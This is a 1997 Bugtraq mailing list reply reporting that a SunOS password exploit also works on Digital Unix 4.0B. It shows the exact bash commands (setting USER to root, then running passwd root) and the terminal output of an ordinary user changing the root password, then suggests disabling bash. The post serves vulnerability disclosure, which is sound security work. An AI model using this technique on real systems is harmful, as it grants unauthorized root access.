Bugtraq mailing list archives

Re: SunOS exploit. & DigitalUnix

From: mmokrejs () PRFDEC NATUR CUNI CZ (Martin Mokrejs)
Date: Tue, 20 May 1997 10:17:29 +0200

This also works on Digital Unix 4.0B :-(

login as generic user, than run bash,

bash-2.00$ export USER="root"
bash-2.00$ passwd root
Last successful password change for root: Sun May  4 16:49:07 1997
Last unsuccessful password change for root: NEVER

New password:
Re-enter new password:
bash-2.00$

I succesfully modified root's password :-( Even we have C2 security
installed:-(

I suggest - disable bash !!!

Martin Mokrejs
mmokrejs () natur cuni cz